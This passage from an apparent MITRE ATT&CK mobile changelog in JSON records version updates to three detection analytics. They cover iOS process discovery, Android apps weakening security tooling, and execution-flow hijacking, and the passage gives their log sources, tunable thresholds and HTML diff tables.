class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ess&nbsp;listing&nbsp;or&nbsp;/proc&nbsp;traversal,&nbsp;(2)&nbsp;app&nbsp;privilege&nbsp;context&nbsp;(r</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">oot,&nbsp;debug&nbsp;build,&nbsp;device&nbsp;owner/profile&nbsp;owner,&nbsp;accessibility/</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">IME&nbsp;status),&nbsp;(3)&nbsp;background&nbsp;execution&nbsp;state,&nbsp;and&nbsp;(4)&nbsp;optiona</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">l&nbsp;follow-on&nbsp;behaviors&nbsp;consistent&nbsp;with&nbsp;automated&nbsp;discovery&nbsp;(s</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">hort&nbsp;bursts&nbsp;of&nbsp;local&nbsp;IPC&nbsp;probes,&nbsp;network&nbsp;beacons&nbsp;immediately</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;after&nbsp;enumeration,&nbsp;or&nbsp;rapid&nbsp;targeting&nbsp;of&nbsp;specific&nbsp;high-valu</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;package/process&nbsp;names).&nbsp;The&nbsp;analytic&nbsp;should&nbsp;describe&nbsp;what&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">is&nbsp;observable:&nbsp;repeated&nbsp;enumeration&nbsp;signals&nbsp;+&nbsp;privilege&nbsp;cont</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ext&nbsp;+&nbsp;timing&nbsp;relationship,&nbsp;not&nbsp;the&nbsp;adversary\u2019s&nbsp;intent.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--5d07c07e-4cde-41b9-a03e-94be43ca9bb8",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-02-23 17:10:37.953000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0692#AN1805",
                            "external_id": "AN1805"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1805",
                    "description": "Defender observes signals consistent with attempted process listing on iOS where modern OS protections generally prevent broad process enumeration for non-root apps. Detections therefore focus on: (1) feasibility gating via integrity/jailbreak posture, and (2) observable security/log anomalies consistent with attempts to query process tables or restricted system interfaces (e.g., repeated sandbox denials, suspicious sysctl-like access attempts, or abnormal use of private frameworks). Correlate integrity compromise indicators with repeated restricted-access events and optional follow-on behaviors (rapid targeting of specific bundles/services or immediate network beacons) to raise confidence that process discovery is occurring.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
                            "name": "MDM:DeviceIntegrity",
                            "channel": "jailbreak/root compromise indicators or integrity attestation failures enabling process visibility"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "iOS:unifiedlog",
                            "channel": "repeated sandbox denials related to restricted process/system interfaces consistent with process-table querying attempts"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "iOS:unifiedlog",
                            "channel": "security-relevant kernel log messages indicating restricted system interface access attempts by app process (device-dependent visibility)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "IntegritySignalRequired",
                            "description": "If true, alert only when integrity/jailbreak posture indicates process discovery is feasible."
                        },
                        {
                            "field": "MinSandboxDenials",
                            "description": "Threshold for sandbox denials within a window to treat as sustained restricted-access attempts."
                        },
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Correlation window between integrity signals and sandbox/network events (e.g., 1\u201324 hours)."
                        },
                        {
                            "field": "AllowlistedBundles",
                            "description": "Enterprise monitoring/networking apps that may generate benign sandbox noise."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"IntegritySignalRequired\", \"description\": \"If true, alert only when integrity/jailbreak posture indicates process discovery is feasible.\"}, {\"field\": \"MinSandboxDenials\", \"description\": \"Threshold for sandbox denials within a window to treat as sustained restricted-access attempts.\"}, {\"field\": \"TimeWindowSeconds\", \"description\": \"Correlation window between integrity signals and sandbox/network events (e.g., 1\\u201324 hours).\"}, {\"field\": \"AllowlistedBundles\", \"description\": \"Enterprise monitoring/networking apps that may generate benign sandbox noise.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-02-23 17:10:37.953000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender observes signals consistent with attempted process listing on iOS where modern OS protections generally prevent broad process enumeration for non-root apps. Detections therefore focus on: (1) feasibility gating via integrity/jailbreak posture, and (2) observable security/log anomalies consistent with attempts to query process tables or restricted system interfaces (e.g., repeated sandbox denials, suspicious sysctl-like access attempts, or abnormal use of private frameworks). Correlate integrity compromise indicators with repeated restricted-access events and optional follow-on behaviors (rapid targeting of specific bundles/services or immediate network beacons) to raise confidence that process discovery is occurring.\", \"old_value\": \"Mobile security products can typically detect rooted devices, which is an indication that Process Discovery is possible. Application vetting could potentially detect when applications attempt to abuse root access or root the system itself. Further, application vetting services could look for attempted usage of legacy process discovery mechanisms, such as the usage of `ps` or inspection of the `/proc` directory.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"MDM:DeviceIntegrity\", \"channel\": \"jailbreak/root compromise indicators or integrity attestation failures enabling process visibility\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa\", \"name\": \"iOS:unifiedlog\", \"channel\": \"repeated sandbox denials related to restricted process/system interfaces consistent with process-table querying attempts\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa\", \"name\": \"iOS:unifiedlog\", \"channel\": \"security-relevant kernel log messages indicating restricted system interface access attempts by app process (device-dependent visibility)\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to192__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to192__0\"><a href=\"#difflib_chg_to192__top\">t</a></td><td class=\"diff_header\" id=\"from192_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Mobile&nbsp;security&nbsp;products&nbsp;can&nbsp;typically&nbsp;detect&nbsp;rooted&nbsp;devices</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to192__top\">t</a></td><td class=\"diff_header\" id=\"to192_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;observes&nbsp;signals&nbsp;consistent&nbsp;with&nbsp;attempted&nbsp;process&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">,&nbsp;which&nbsp;is&nbsp;an&nbsp;indication&nbsp;that&nbsp;Process&nbsp;Discovery&nbsp;is&nbsp;possible.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">listing&nbsp;on&nbsp;iOS&nbsp;where&nbsp;modern&nbsp;OS&nbsp;protections&nbsp;generally&nbsp;prevent</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;Application&nbsp;vetting&nbsp;could&nbsp;potentially&nbsp;detect&nbsp;when&nbsp;applicati</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;broad&nbsp;process&nbsp;enumeration&nbsp;for&nbsp;non-root&nbsp;apps.&nbsp;Detections&nbsp;the</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ons&nbsp;attempt&nbsp;to&nbsp;abuse&nbsp;root&nbsp;access&nbsp;or&nbsp;root&nbsp;the&nbsp;system&nbsp;itself.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">refore&nbsp;focus&nbsp;on:&nbsp;(1)&nbsp;feasibility&nbsp;gating&nbsp;via&nbsp;integrity/jailbr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Further,&nbsp;application&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;attempt</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">eak&nbsp;posture,&nbsp;and&nbsp;(2)&nbsp;observable&nbsp;security/log&nbsp;anomalies&nbsp;consi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ed&nbsp;usage&nbsp;of&nbsp;legacy&nbsp;process&nbsp;discovery&nbsp;mechanisms,&nbsp;such&nbsp;as&nbsp;the</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">stent&nbsp;with&nbsp;attempts&nbsp;to&nbsp;query&nbsp;process&nbsp;tables&nbsp;or&nbsp;restricted&nbsp;sy</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;usage&nbsp;of&nbsp;`ps`&nbsp;or&nbsp;inspection&nbsp;of&nbsp;the&nbsp;`/proc`&nbsp;directory.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">stem&nbsp;interfaces&nbsp;(e.g.,&nbsp;repeated&nbsp;sandbox&nbsp;denials,&nbsp;suspicious&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">sysctl-like&nbsp;access&nbsp;attempts,&nbsp;or&nbsp;abnormal&nbsp;use&nbsp;of&nbsp;private&nbsp;fram</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">eworks).&nbsp;Correlate&nbsp;integrity&nbsp;compromise&nbsp;indicators&nbsp;with&nbsp;repe</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ated&nbsp;restricted-access&nbsp;events&nbsp;and&nbsp;optional&nbsp;follow-on&nbsp;behavio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rs&nbsp;(rapid&nbsp;targeting&nbsp;of&nbsp;specific&nbsp;bundles/services&nbsp;or&nbsp;immediat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;network&nbsp;beacons)&nbsp;to&nbsp;raise&nbsp;confidence&nbsp;that&nbsp;process&nbsp;discover</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">y&nbsp;is&nbsp;occurring.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--75eaee42-f7b5-4792-9611-74626bd98838",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-24 20:30:26.476000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0693#AN1806",
                            "external_id": "AN1806"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1806",
                    "description": "Correlates (1) application acquisition or use of elevated control paths capable of altering defensive tooling or protected system state, such as device administration, root-enabled modification, or security-setting manipulation, (2) direct changes to security-tool configuration, service state, package state, or protected enforcement settings such as SELinux-relevant files or security-app components, and (3) immediate degradation, suppression, or disappearance of expected security telemetry while the device and initiating application remain active. The defender observes a causal chain where a security control is modified first, then monitoring or protection weakens, and subsequent activity continues under reduced defensive visibility.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "device posture changes to rooted, non-compliant, weakened security state, or elevated control role becomes active before security-tool degradation"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "security-relevant application package state, enabled status, administrator state, or managed protection setting changes immediately before monitoring degradation"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes package, settings, or privileged framework operations capable of disabling security software, altering security enforcement, or interfering with reporting before telemetry loss"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "MobileEDR:telemetry",
                            "channel": "application modifies protected configuration, local control files, security settings, or tool-related data immediately before security service degradation or non-reporting state"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between security-setting change, tool degradation, and subsequent continued activity"
                        },
                        {
                            "field": "CriticalToolSet",
                            "description": "Security-relevant applications or components expected to remain enabled and reporting, such as mobile EDR, Play Protect-associated controls, or agent services"
                        },
                        {
                            "field": "TelemetryGapThreshold",
                            "description": "Duration or volume threshold defining abnormal loss of expected security telemetry"
                        },
                        {
                            "field": "ProtectedSettingSet",
                            "description": "Protected settings or files treated as suspicious if modified, including SELinux-relevant enforcement state or security-app configuration"
                        },
                        {
                            "field": "AllowedAdminApps",
                            "description": "Legitimate applications or management agents allowed to modify security-relevant posture"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Outbound traffic threshold used to confirm continued meaningful activity during reduced defensive visibility"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between security-setting change, tool degradation, and subsequent continued activity\"}, {\"field\": \"CriticalToolSet\", \"description\": \"Security-relevant applications or components expected to remain enabled and reporting, such as mobile EDR, Play Protect-associated controls, or agent services\"}, {\"field\": \"TelemetryGapThreshold\", \"description\": \"Duration or volume threshold defining abnormal loss of expected security telemetry\"}, {\"field\": \"ProtectedSettingSet\", \"description\": \"Protected settings or files treated as suspicious if modified, including SELinux-relevant enforcement state or security-app configuration\"}, {\"field\": \"AllowedAdminApps\", \"description\": \"Legitimate applications or management agents allowed to modify security-relevant posture\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Outbound traffic threshold used to confirm continued meaningful activity during reduced defensive visibility\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 20:30:26.476000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates (1) application acquisition or use of elevated control paths capable of altering defensive tooling or protected system state, such as device administration, root-enabled modification, or security-setting manipulation, (2) direct changes to security-tool configuration, service state, package state, or protected enforcement settings such as SELinux-relevant files or security-app components, and (3) immediate degradation, suppression, or disappearance of expected security telemetry while the device and initiating application remain active. The defender observes a causal chain where a security control is modified first, then monitoring or protection weakens, and subsequent activity continues under reduced defensive visibility.\", \"old_value\": \"The user can view a list of active device administrators in the device settings.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"device posture changes to rooted, non-compliant, weakened security state, or elevated control role becomes active before security-tool degradation\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"security-relevant application package state, enabled status, administrator state, or managed protection setting changes immediately before monitoring degradation\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes package, settings, or privileged framework operations capable of disabling security software, altering security enforcement, or interfering with reporting before telemetry loss\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application modifies protected configuration, local control files, security settings, or tool-related data immediately before security service degradation or non-reporting state\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to207__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to207__0\"><a href=\"#difflib_chg_to207__top\">t</a></td><td class=\"diff_header\" id=\"from207_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">The&nbsp;user&nbsp;can&nbsp;view&nbsp;a&nbsp;list&nbsp;of&nbsp;active&nbsp;device&nbsp;administrators&nbsp;in&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to207__top\">t</a></td><td class=\"diff_header\" id=\"to207_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;(1)&nbsp;application&nbsp;acquisition&nbsp;or&nbsp;use&nbsp;of&nbsp;elevated&nbsp;co</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">the&nbsp;device&nbsp;settings.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ntrol&nbsp;paths&nbsp;capable&nbsp;of&nbsp;altering&nbsp;defensive&nbsp;tooling&nbsp;or&nbsp;protect</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ed&nbsp;system&nbsp;state,&nbsp;such&nbsp;as&nbsp;device&nbsp;administration,&nbsp;root-enabled</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;modification,&nbsp;or&nbsp;security-setting&nbsp;manipulation,&nbsp;(2)&nbsp;direct&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">changes&nbsp;to&nbsp;security-tool&nbsp;configuration,&nbsp;service&nbsp;state,&nbsp;packa</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ge&nbsp;state,&nbsp;or&nbsp;protected&nbsp;enforcement&nbsp;settings&nbsp;such&nbsp;as&nbsp;SELinux-</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">relevant&nbsp;files&nbsp;or&nbsp;security-app&nbsp;components,&nbsp;and&nbsp;(3)&nbsp;immediate</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;degradation,&nbsp;suppression,&nbsp;or&nbsp;disappearance&nbsp;of&nbsp;expected&nbsp;secu</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rity&nbsp;telemetry&nbsp;while&nbsp;the&nbsp;device&nbsp;and&nbsp;initiating&nbsp;application&nbsp;r</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">emain&nbsp;active.&nbsp;The&nbsp;defender&nbsp;observes&nbsp;a&nbsp;causal&nbsp;chain&nbsp;where&nbsp;a&nbsp;s</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ecurity&nbsp;control&nbsp;is&nbsp;modified&nbsp;first,&nbsp;then&nbsp;monitoring&nbsp;or&nbsp;protec</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tion&nbsp;weakens,&nbsp;and&nbsp;subsequent&nbsp;activity&nbsp;continues&nbsp;under&nbsp;reduce</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d&nbsp;defensive&nbsp;visibility.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--09ea8707-d76c-44ae-b077-19a8949faa90",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-13 15:50:52.912000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0694#AN1807",
                            "external_id": "AN1807"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1807",
                    "description": "Correlates (1) abnormal application or system resource resolution behavior (e.g., library loading, path resolution, or intent redirection), (2) execution of code or resources not aligned with the originating application\u2019s package identity or expected runtime context, and (3) follow-on execution or network activity originating from the hijacked flow. The defender observes a causal chain where execution is redirected from an expected code path to an alternate resource or payload, resulting in execution under a trusted context but with untrusted origin.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "application launches or executes code where loaded library or component path does not match application package path or expected signing context"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
                            "name": "MobileEDR:telemetry",
                            "channel": "application loads executable or library from external or writable directory (e.g., /sdcard/, app cache) prior to execution"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "MobileEDR:telemetry",
                            "channel": "application execution triggered with unexpected parent context or via indirect invocation (intent redirection or component hijack)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between abnormal resource loading and execution/network activity"
                        },
                        {
                            "field": "AllowedLibraryPaths",
                            "description": "Baseline of expected library/resource load paths per application"
                        },
                        {
                            "field": "TrustedSignatureList",
                            "description": "Trusted signing identities for application components"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Applications allowed to dynamically load code or use external resources"
                        }
                    ],
                    "x_mitre_platforms": [
